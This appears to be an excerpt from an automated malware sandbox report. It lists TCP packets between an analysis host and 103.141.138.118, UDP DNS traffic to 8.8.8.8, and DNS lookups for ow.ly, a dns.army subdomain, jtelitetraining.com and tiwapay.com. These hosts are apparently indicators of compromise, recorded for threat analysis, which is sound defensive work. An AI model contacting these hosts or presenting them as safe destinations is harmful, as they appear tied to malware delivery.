                                                                                                                                                          Feb 23, 2021 17:47:44.354001045 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.354029894 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.357508898 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.357567072 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.357606888 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.357619047 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.357646942 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.357646942 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.357685089 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.357696056 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.357723951 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.357727051 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.357763052 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.357774019 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.357806921 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.357811928 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.357853889 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.357857943 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.357892036 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.357903957 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.357932091 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.357933998 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.357970953 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.357981920 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358010054 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358021021 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358051062 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358055115 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358089924 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358139038 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358150959 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358181000 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358182907 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358220100 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358232021 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358258963 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358261108 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358298063 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358309031 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358335972 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358340025 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358369112 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358374119 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358429909 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358436108 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358465910 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358478069 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358520031 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358525991 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358553886 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358557940 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358597040 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358607054 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358635902 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358635902 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358673096 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358686924 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358711958 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358714104 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358751059 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358762026 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358798981 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358798981 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358843088 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358849049 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358876944 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358881950 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358921051 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358931065 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358958006 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358959913 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358997107 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.359008074 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.359035015 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.359036922 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.359075069 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.359085083 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.359118938 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.359122038 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.359164953 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.359169960 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.359196901 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.359203100 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.359241962 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.359246969 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.359273911 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368191004 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368247032 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368295908 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368304014 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368325949 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368330002 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368339062 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368376970 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368587971 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368627071 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368632078 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368669987 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368670940 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368709087 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368710995 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368757963 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368762016 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368798971 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368798971 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368837118 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368838072 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368875027 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368875980 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368911982 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368922949 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368961096 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368967056 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369004011 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369004965 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369039059 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369045019 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369081020 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369082928 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369119883 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369121075 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369158030 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369159937 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369194984 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369198084 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369231939 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369245052 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369281054 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369287968 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369324923 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369324923 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369365931 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369374990 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369410038 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369436979 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369473934 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369474888 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369512081 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369513988 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369549990 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369551897 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369587898 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369590044 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369626999 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369637012 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369674921 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369679928 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369716883 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369718075 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369755030 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369756937 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369791985 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369795084 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369832993 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.576122999 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.576203108 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.576246023 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.576288939 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.576337099 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.576378107 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.576425076 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.576431990 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.576467037 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.576481104 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.576512098 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.576545954 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.576560974 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.576591015 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.576601028 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.576627016 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.576642036 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.576649904 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.576687098 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.576698065 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.576740980 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.576767921 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.576780081 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.576781988 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.576838017 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.576844931 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.576879025 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.576905012 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.576915979 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.576929092 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.576977968 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.577006102 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.577018976 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.577044964 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.577055931 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.577064037 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.577111959 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.577141047 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.577153921 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.577156067 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.577195883 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.577225924 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.577238083 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.577240944 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.577280045 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.577308893 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.577322960 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.577327967 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.577363014 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.577424049 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.577430010 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.577435970 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.577481985 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.577513933 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.577543974 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.579729080 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.581042051 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.581135035 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.581165075 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.581217051 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.581247091 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.581263065 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.581264973 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.581305981 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.581336021 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.581348896 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.581350088 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.581410885 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.581412077 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.581460953 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.581490993 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.581510067 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.581510067 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.581557989 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.581590891 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.581603050 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.581605911 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.581645966 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.581674099 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.581685066 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.581688881 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.581753016 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.581753969 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.581796885 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.581826925 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.581840038 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.581841946 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.581880093 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.581907988 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.581918955 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.587439060 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.589481115 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:45.076391935 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:48:45.943470955 CET4916780192.168.2.22160.153.136.3
                                                                                                                                                          Feb 23, 2021 17:48:45.993051052 CET8049167160.153.136.3192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:48:45.993206024 CET4916780192.168.2.22160.153.136.3
                                                                                                                                                          Feb 23, 2021 17:48:45.993432999 CET4916780192.168.2.22160.153.136.3
                                                                                                                                                          Feb 23, 2021 17:48:46.042944908 CET8049167160.153.136.3192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:48:46.043241978 CET4916780192.168.2.22160.153.136.3
                                                                                                                                                          Feb 23, 2021 17:48:46.043423891 CET4916780192.168.2.22160.153.136.3
                                                                                                                                                          Feb 23, 2021 17:48:46.093544960 CET8049167160.153.136.3192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:49:02.264713049 CET4916880192.168.2.2281.169.145.165
                                                                                                                                                          Feb 23, 2021 17:49:02.307727098 CET804916881.169.145.165192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:49:02.307904005 CET4916880192.168.2.2281.169.145.165
                                                                                                                                                          Feb 23, 2021 17:49:02.308176041 CET4916880192.168.2.2281.169.145.165
                                                                                                                                                          Feb 23, 2021 17:49:02.351290941 CET804916881.169.145.165192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:49:02.355357885 CET804916881.169.145.165192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:49:02.355384111 CET804916881.169.145.165192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:49:02.355547905 CET4916880192.168.2.2281.169.145.165
                                                                                                                                                          Feb 23, 2021 17:49:02.355647087 CET4916880192.168.2.2281.169.145.165
                                                                                                                                                          Feb 23, 2021 17:49:02.400244951 CET804916881.169.145.165192.168.2.22

                                                                                                                                                          UDP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Feb 23, 2021 17:47:41.639518023 CET5219753192.168.2.228.8.8.8
                                                                                                                                                          Feb 23, 2021 17:47:41.697148085 CET53521978.8.8.8192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:41.697361946 CET5219753192.168.2.228.8.8.8
                                                                                                                                                          Feb 23, 2021 17:47:41.754817009 CET53521978.8.8.8192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:42.210675955 CET5309953192.168.2.228.8.8.8
                                                                                                                                                          Feb 23, 2021 17:47:42.278045893 CET53530998.8.8.8192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:42.278484106 CET5309953192.168.2.228.8.8.8
                                                                                                                                                          Feb 23, 2021 17:47:42.344486952 CET53530998.8.8.8192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:48:45.857974052 CET5283853192.168.2.228.8.8.8
                                                                                                                                                          Feb 23, 2021 17:48:45.931737900 CET53528388.8.8.8192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:49:02.190536022 CET6120053192.168.2.228.8.8.8
                                                                                                                                                          Feb 23, 2021 17:49:02.263454914 CET53612008.8.8.8192.168.2.22

                                                                                                                                                          DNS Queries

                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                          Feb 23, 2021 17:47:41.639518023 CET192.168.2.228.8.8.80x68caStandard query (0)ow.lyA (IP address)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:47:41.697361946 CET192.168.2.228.8.8.80x68caStandard query (0)ow.lyA (IP address)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:47:42.210675955 CET192.168.2.228.8.8.80xc2deStandard query (0)thdyworkfinerainbotm.dns.armyA (IP address)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:47:42.278484106 CET192.168.2.228.8.8.80xc2deStandard query (0)thdyworkfinerainbotm.dns.armyA (IP address)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:48:45.857974052 CET192.168.2.228.8.8.80xccffStandard query (0)www.jtelitetraining.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:49:02.190536022 CET192.168.2.228.8.8.80x2e78Standard query (0)www.tiwapay.comA (IP address)IN (0x0001)

                                                                                                                                                          DNS Answers

                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                          Feb 23, 2021 17:47:41.697148085 CET8.8.8.8192.168.2.220x68caNo error (0)ow.ly54.67.120.65A (IP address)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:47:41.697148085 CET8.8.8.8192.168.2.220x68caNo error (0)ow.ly54.67.62.204A (IP address)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:47:41.697148085 CET8.8.8.8192.168.2.220x68caNo error (0)ow.ly54.183.132.164A (IP address)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:47:41.697148085 CET8.8.8.8192.168.2.220x68caNo error (0)ow.ly54.67.57.56A (IP address)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:47:41.697148085 CET8.8.8.8192.168.2.220x68caNo error (0)ow.ly54.183.131.91A (IP address)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:47:41.754817009 CET8.8.8.8192.168.2.220x68caNo error (0)ow.ly54.67.120.65A (IP address)IN (0x0001)
